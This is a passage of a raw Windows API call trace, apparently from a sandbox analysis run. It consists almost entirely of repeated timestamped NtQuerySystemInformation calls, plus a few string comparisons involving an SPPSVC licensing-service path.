(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0221.463] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x28, ResultLength=0x0) [0221.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0221.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0221.476] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x50, ResultLength=0x0) [0221.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x28, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0221.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0221.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x50, ResultLength=0x0) [0226.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x50, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x50, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x50, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x50, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x50, ResultLength=0x0) [0226.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x50, ResultLength=0x0) [0226.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec50, Length=0x28, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0226.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecd0, Length=0x28, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb70, Length=0x20, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x20, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x20, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x20, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x38, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec30, Length=0x20, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febc0, Length=0x20, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0226.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefe0, Length=0x50, ResultLength=0x0) [0226.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x28, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedb0, Length=0x28, ResultLength=0x0) [0226.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x28, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x28, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x38, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0226.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 